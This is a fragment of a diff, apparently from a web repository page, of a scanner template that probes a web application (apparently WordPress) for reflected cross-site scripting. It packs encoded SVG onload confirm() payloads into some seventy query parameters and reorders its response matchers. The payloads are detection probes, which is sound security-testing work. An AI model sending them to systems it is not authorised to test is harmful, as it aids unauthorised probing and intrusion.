- "{{BaseURL}}/?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E"
|
- "tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E"
|
||||||
|
- "widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E"
|
||||||
|
- "num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E"
|
||||||
|
- "admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E"
|
||||||
|
- "location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E"
|
||||||
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 1
|
max-redirects: 1
|
||||||
|
@ -63,15 +66,15 @@ http:
|
||||||
words:
|
words:
|
||||||
- "text/html"
|
- "text/html"
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: body
|
|
||||||
condition: or
|
|
||||||
negative: true
|
|
||||||
words:
|
|
||||||
- "<title>Access Denied</title>"
|
|
||||||
- "You don't have permission to access"
|
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
condition: or
|
||||||
|
words:
|
||||||
|
- "<title>Access Denied</title>"
|
||||||
|
- "You don't have permission to access"
|
||||||
|
negative: true
|
||||||
# digest: 4a0a004730450220422fa88099c081d3188fb7d1e5615710b29e2f5ec74a4daccf72f1faa714fcda02210093290ee6f988d9ad886291b9c801bbdd358e83fdcdd779ecbf65413328fc6d0d:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220422fa88099c081d3188fb7d1e5615710b29e2f5ec74a4daccf72f1faa714fcda02210093290ee6f988d9ad886291b9c801bbdd358e83fdcdd779ecbf65413328fc6d0d:922c64590222798bb761d5b6d8e72950
|
Loading…
Reference in New Issue